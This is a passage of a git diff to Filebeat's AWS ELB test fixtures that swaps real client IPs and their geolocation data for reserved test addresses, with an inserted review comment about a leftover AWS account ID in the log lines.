HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0997a-5add00b04bc8ae20ae96d9f0" "-" "-" 0 2019-10-11T15:02:18.836000Z "forward" "-" "-" -http 2019-10-11T15:02:41.203002Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:56638 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09987-cc391940b332434860dfa848" "-" "-" 0 2019-10-11T15:02:31.202000Z "forward" "-" "-" -http 2019-10-11T15:03:49.331902Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:37632 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da099cb-3d3b17eb2b75373f4c0c36c5" "-" "-" 0 2019-10-11T15:03:39.331000Z "forward" "-" "-" -http 2019-10-11T15:55:09.308183Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:37838 10.0.0.192:80 0.001 0.000 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5dd-4d9a423a0e9a782fe2f390af" "-" "-" 0 2019-10-11T15:55:09.307000Z "forward" "-" "-" -http 2019-10-11T15:55:11.354283Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:37850 10.0.1.107:80 0.001 0.001 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5df-7d64cabe9955b4df9acc800a" "-" "-" 0 2019-10-11T15:55:11.352000Z 
"forward" "-" "-" -http 2019-10-11T15:55:11.987940Z app/filebeat-aws-elb-test/c86a326e7dc14222 77.227.156.41:37856 10.0.0.192:80 0.000 0.001 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5df-7c958e828ff43b63d0e0fac4" "-" "-" 0 2019-10-11T15:55:11.987000Z "forward" "-" "-" +http 2019-10-11T15:01:12.376735Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56398 10.0.0.192:80 -1 -1 -1 460 - 125 0 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09932-2c342a443bfb96249aa50ed7" "-" "-" 0 2019-10-11T15:01:06.657000Z "forward" "-" "-" +http 2019-10-11T15:01:50.492440Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56488 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09954-2c342a443bfb96249aa50ed7" "-" "-" 0 2019-10-11T15:01:40.491000Z "forward" "-" "-" +http 2019-10-11T15:01:22.915238Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56416 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09938-d9c72660e247c36070017828" "-" "-" 0 2019-10-11T15:01:12.914000Z "forward" "-" "-" +http 2019-10-11T15:01:35.190447Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56448 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ 
HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09945-0eaa8050df7d96f84806ded0" "-" "-" 0 2019-10-11T15:01:25.189000Z "forward" "-" "-" +http 2019-10-11T15:02:28.837316Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56602 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0997a-5add00b04bc8ae20ae96d9f0" "-" "-" 0 2019-10-11T15:02:18.836000Z "forward" "-" "-" +http 2019-10-11T15:02:41.203002Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:56638 10.0.1.107:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da09987-cc391940b332434860dfa848" "-" "-" 0 2019-10-11T15:02:31.202000Z "forward" "-" "-" +http 2019-10-11T15:03:49.331902Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:37632 10.0.0.192:80 -1 -1 -1 504 - 125 308 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da099cb-3d3b17eb2b75373f4c0c36c5" "-" "-" 0 2019-10-11T15:03:39.331000Z "forward" "-" "-" +http 2019-10-11T15:55:09.308183Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:37838 10.0.0.192:80 0.001 0.000 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5dd-4d9a423a0e9a782fe2f390af" "-" "-" 0 2019-10-11T15:55:09.307000Z "forward" "-" "-" 
+http 2019-10-11T15:55:11.354283Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:37850 10.0.1.107:80 0.001 0.001 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5df-7d64cabe9955b4df9acc800a" "-" "-" 0 2019-10-11T15:55:11.352000Z "forward" "-" "-" +http 2019-10-11T15:55:11.987940Z app/filebeat-aws-elb-test/c86a326e7dc14222 81.2.69.193:37856 10.0.0.192:80 0.000 0.001 0.000 200 200 125 859 "GET http://filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - arn:aws:elasticloadbalancing:eu-central-1:627959692251:targetgroup/test-lb-instances/8f04c4fe71f5f794 "Root=1-5da0a5df-7c958e828ff43b63d0e0fac4" "-" "-" 0 2019-10-11T15:55:11.987000Z "forward" "-" "-" http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 "GET http://www.example.com:80/ HTTP/1.1" "curl/7.46.0" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 "Root=1-58337262-36d228ad5d99923122bbe354" "-" "-" 0 2018-07-02T22:22:48.364000Z "forward,redirect" "-" "-" "10.0.0.1:80" "200" "-" "-" diff --git a/x-pack/filebeat/module/aws/elb/test/application-lb-http.log-expected.json b/x-pack/filebeat/module/aws/elb/test/application-lb-http.log-expected.json index 6b1533adb578..08d7d7380622 100644 --- a/x-pack/filebeat/module/aws/elb/test/application-lb-http.log-expected.json +++ b/x-pack/filebeat/module/aws/elb/test/application-lb-http.log-expected.json 
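Review bot: Every rewritten `+http` line still carries the 12-digit account ID `627959692251` inside the target-group ARN and the load balancer's real-looking DNS name `filebeat-aws-elb-test-12030537.eu-central-1.elb.amazonaws.com`, while only the client address was moved to the reserved `81.2.69.193` test IP. If that account is a real one, it is the same class of identifying detail this commit is scrubbing; the unchanged sample at the end of the hunk already uses the AWS documentation placeholder `123456789012` with `my-loadbalancer`, so the new lines could do the same, e.g. `arn:aws:elasticloadbalancing:eu-central-1:123456789012:targetgroup/test-lb-instances/8f04c4fe71f5f794`. Substituting another 12-digit value keeps each line's length and therefore the `log.offset` values in the expected file; shortening the hostname would require regenerating them.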
@@ -29,17 +29,15 @@
 "input.type": "log",
 "log.offset": 0,
 "service.type": "aws",
- "source.as.number": 12430,
- "source.as.organization.name": "Vodafone Spain",
- "source.geo.city_name": "Teruel",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.3456,
- "source.geo.location.lon": -1.1065,
- "source.geo.region_iso_code": "ES-TE",
- "source.geo.region_name": "Teruel",
- "source.ip": "77.227.156.41",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.193",
 "source.port": "56398",
 "tags": [
 "forwarded"
@@ -83,19 +81,17 @@
 "http.response.status_code": 504,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 438,
+ "log.offset": 436,
 "service.type": "aws",
- "source.as.number": 12430,
- "source.as.organization.name": "Vodafone Spain",
- "source.geo.city_name": "Teruel",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.3456,
- "source.geo.location.lon": -1.1065,
- "source.geo.region_iso_code": "ES-TE",
- "source.geo.region_name": "Teruel",
- "source.ip": "77.227.156.41",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.193",
 "source.port": "56488",
 "tags": [
 "forwarded"
@@ -139,19 +135,17 @@
 "http.response.status_code": 504,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 878,
+ "log.offset": 874,
 "service.type": "aws",
- "source.as.number": 12430,
- "source.as.organization.name": "Vodafone Spain",
- "source.geo.city_name": "Teruel",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.3456,
- "source.geo.location.lon": -1.1065,
- "source.geo.region_iso_code": "ES-TE",
- "source.geo.region_name": "Teruel",
- "source.ip": "77.227.156.41",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.193",
 "source.port": "56416",
 "tags": [
 "forwarded"
@@ -195,19 +189,17 @@
 "http.response.status_code": 504,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 1318,
+ "log.offset": 1312,
 "service.type": "aws",
- "source.as.number": 12430,
- "source.as.organization.name": "Vodafone Spain",
- "source.geo.city_name": "Teruel",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.3456,
- "source.geo.location.lon": -1.1065,
- "source.geo.region_iso_code": "ES-TE",
- "source.geo.region_name": "Teruel",
- "source.ip": "77.227.156.41",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.193",
 "source.port": "56448",
 "tags": [
 "forwarded"
@@ -251,19 +243,17 @@
 "http.response.status_code": 504,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 1758,
+ "log.offset": 1750,
 "service.type": "aws",
- "source.as.number": 12430,
- "source.as.organization.name": "Vodafone Spain",
- "source.geo.city_name": "Teruel",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.3456,
- "source.geo.location.lon": -1.1065,
- "source.geo.region_iso_code": "ES-TE",
- "source.geo.region_name": "Teruel",
- "source.ip": "77.227.156.41",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.193",
 "source.port": "56602",
 "tags": [
 "forwarded"
@@ -307,19 +297,17 @@
 "http.response.status_code": 504,
 "http.version": "1.1",
 "input.type": "log",
- "log.offset": 2198,
+ "log.offset": 2188,
 "service.type": "aws",
- "source.as.number": 12430,
- "source.as.organization.name": "Vodafone Spain",
- "source.geo.city_name": "Teruel",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 40.3456,
- "source.geo.location.lon": -1.1065,
- "source.geo.region_iso_code": "ES-TE",
- "source.geo.region_name": "Teruel",
- "source.ip": "77.227.156.41",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.193",
 "source.port": "56638",
 "tags": [
 "forwarded"
@@ -363,19 +351,17 @@ "http.response.status_code": 504, "http.version": "1.1", "input.type": "log", - "log.offset": 2638, + "log.offset": 2626, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "37632", "tags": [ "forwarded" @@ -423,19 +409,17 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 3078, + "log.offset": 3064, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "37838", "tags": [ "forwarded" 
@@ -483,19 +467,17 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 3529, + "log.offset": 3513, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "37850", "tags": [ "forwarded" @@ -543,19 +525,17 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 3980, + "log.offset": 3962, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "37856", "tags": [ "forwarded" 
@@ -610,7 +590,7 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 4431, + "log.offset": 4411, "service.type": "aws", "source.ip": "192.168.131.39", "source.port": "2817", diff --git a/x-pack/filebeat/module/aws/elb/test/elb-http.log b/x-pack/filebeat/module/aws/elb/test/elb-http.log index 8199e6cc0a3e..bed55efca409 100644 --- a/x-pack/filebeat/module/aws/elb/test/elb-http.log +++ b/x-pack/filebeat/module/aws/elb/test/elb-http.log 
@@ -1,6 +1,6 @@ -2019-10-14T12:00:20.694172Z filebeat-aws-elb-test 78.24.182.42:54106 10.0.1.185:80 0.000043 0.000785 0.000023 200 200 0 612 "GET http://18.194.223.56:80/ HTTP/1.1" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" - - -2019-10-14T12:01:41.918996Z filebeat-aws-elb-test 31.135.65.4:54001 10.0.0.169:80 0.000041 0.00491 0.000027 200 200 0 612 "GET http://18.194.223.56:80/ HTTP/1.1" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" - - -2019-10-14T12:01:49.543250Z filebeat-aws-elb-test 77.227.156.41:52406 10.0.1.185:80 0.000041 0.00079 0.000024 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - -2019-10-14T12:01:50.199250Z filebeat-aws-elb-test 77.227.156.41:52410 10.0.0.169:80 0.000039 0.001184 0.000028 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - -2019-10-14T12:01:50.831170Z filebeat-aws-elb-test 77.227.156.41:52414 10.0.1.185:80 0.000038 0.000787 0.000024 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - +2019-10-14T12:00:20.694172Z filebeat-aws-elb-test 175.16.199.1:54106 10.0.1.185:80 0.000043 0.000785 0.000023 200 200 0 612 "GET http://18.194.223.56:80/ HTTP/1.1" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" - - +2019-10-14T12:01:41.918996Z filebeat-aws-elb-test 81.2.69.143:54001 10.0.0.169:80 0.000041 0.00491 0.000027 200 200 0 612 "GET http://18.194.223.56:80/ HTTP/1.1" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" - - +2019-10-14T12:01:49.543250Z filebeat-aws-elb-test 81.2.69.193:52406 10.0.1.185:80 0.000041 0.00079 0.000024 200 200 0 612 "GET 
http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - +2019-10-14T12:01:50.199250Z filebeat-aws-elb-test 81.2.69.193:52410 10.0.0.169:80 0.000039 0.001184 0.000028 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - +2019-10-14T12:01:50.831170Z filebeat-aws-elb-test 81.2.69.193:52414 10.0.1.185:80 0.000038 0.000787 0.000024 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - - diff --git a/x-pack/filebeat/module/aws/elb/test/elb-http.log-expected.json b/x-pack/filebeat/module/aws/elb/test/elb-http.log-expected.json index 6f47911622a9..c727cc9d9345 100644 --- a/x-pack/filebeat/module/aws/elb/test/elb-http.log-expected.json +++ b/x-pack/filebeat/module/aws/elb/test/elb-http.log-expected.json @@ -25,17 +25,15 @@ "input.type": "log", "log.offset": 0, "service.type": "aws", - "source.as.number": 35377, - "source.as.organization.name": "Ao a.b.n.", - "source.geo.city_name": "Moscow", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "RU", - "source.geo.country_name": "Russia", - "source.geo.location.lat": 55.7527, - "source.geo.location.lon": 37.6172, - "source.geo.region_iso_code": "RU-MOW", - "source.geo.region_name": "Moscow", - "source.ip": "78.24.182.42", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "source.port": "54106", "tags": [ "forwarded" 
@@ -79,17 +77,15 @@ "input.type": "log", "log.offset": 271, "service.type": "aws", - "source.as.number": 43865, - "source.as.organization.name": "Intek-M LLC", - "source.geo.city_name": "Mytishchi", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "RU", - "source.geo.country_name": "Russia", - "source.geo.location.lat": 55.9089, - "source.geo.location.lon": 37.7339, - "source.geo.region_iso_code": "RU-MOS", - "source.geo.region_name": "Moscow Oblast", - "source.ip": "31.135.65.4", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": "54001", "tags": [ "forwarded" @@ -133,17 +129,15 @@ "input.type": "log", "log.offset": 540, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "52406", "tags": [ "forwarded" 
@@ -182,19 +176,17 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 772, + "log.offset": 770, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "52410", "tags": [ "forwarded" @@ -233,19 +225,17 @@ "http.response.status_code": 200, "http.version": "1.1", "input.type": "log", - "log.offset": 1005, + "log.offset": 1001, "service.type": "aws", - "source.as.number": 12430, - "source.as.organization.name": "Vodafone Spain", - "source.geo.city_name": "Teruel", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 40.3456, - "source.geo.location.lon": -1.1065, - "source.geo.region_iso_code": "ES-TE", - "source.geo.region_name": "Teruel", - "source.ip": "77.227.156.41", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": "52414", "tags": [ "forwarded" 
diff --git a/x-pack/filebeat/module/aws/elb/test/elb-tcp.log b/x-pack/filebeat/module/aws/elb/test/elb-tcp.log
index 2ef0527debf4..bbb1acddc908 100644
--- a/x-pack/filebeat/module/aws/elb/test/elb-tcp.log
+++ b/x-pack/filebeat/module/aws/elb/test/elb-tcp.log
@@ -1,6 +1,6 @@
-2019-10-17T13:22:51.758784Z filebeat-aws-elb-test-elb 77.227.156.41:51600 10.0.0.47:80 0.000943 0.00001 0.000015 - - 134 859 "- - - " "-" - -
-2019-10-17T13:23:07.523763Z filebeat-aws-elb-test-elb 77.227.156.41:51726 10.0.1.184:80 0.000501 0.00001 0.000015 - - 134 859 "- - - " "-" - -
-2019-10-17T13:23:08.477627Z filebeat-aws-elb-test-elb 77.227.156.41:51734 10.0.0.47:80 0.001105 0.00001 0.000015 - - 134 859 "- - - " "-" - -
-2019-10-17T13:23:09.174797Z filebeat-aws-elb-test-elb 77.227.156.41:51738 10.0.1.184:80 0.000422 0.000009 0.000013 - - 134 859 "- - - " "-" - -
-2019-10-17T13:26:14.308385Z filebeat-aws-elb-test-elb 77.227.156.41:46288 10.0.0.47:80 0.000534 0.000011 0.000016 - - 7 343 "- - - " "-" - -
-2019-10-17T13:26:19.318250Z filebeat-aws-elb-test-elb 77.227.156.41:46304 10.0.1.184:80 0.001004 0.00001 0.000015 - - 17 343 "- - - " "-" - -
+2019-10-17T13:22:51.758784Z filebeat-aws-elb-test-elb 81.2.69.193:51600 10.0.0.47:80 0.000943 0.00001 0.000015 - - 134 859 "- - - " "-" - -
+2019-10-17T13:23:07.523763Z filebeat-aws-elb-test-elb 81.2.69.193:51726 10.0.1.184:80 0.000501 0.00001 0.000015 - - 134 859 "- - - " "-" - -
+2019-10-17T13:23:08.477627Z filebeat-aws-elb-test-elb 81.2.69.193:51734 10.0.0.47:80 0.001105 0.00001 0.000015 - - 134 859 "- - - " "-" - -
+2019-10-17T13:23:09.174797Z filebeat-aws-elb-test-elb 81.2.69.193:51738 10.0.1.184:80 0.000422 0.000009 0.000013 - - 134 859 "- - - " "-" - -
+2019-10-17T13:26:14.308385Z filebeat-aws-elb-test-elb 81.2.69.193:46288 10.0.0.47:80 0.000534 0.000011 0.000016 - - 7 343 "- - - " "-" - -
+2019-10-17T13:26:19.318250Z filebeat-aws-elb-test-elb 81.2.69.193:46304 10.0.1.184:80 0.001004 0.00001 0.000015 - - 17 343 "- - - " "-" - -
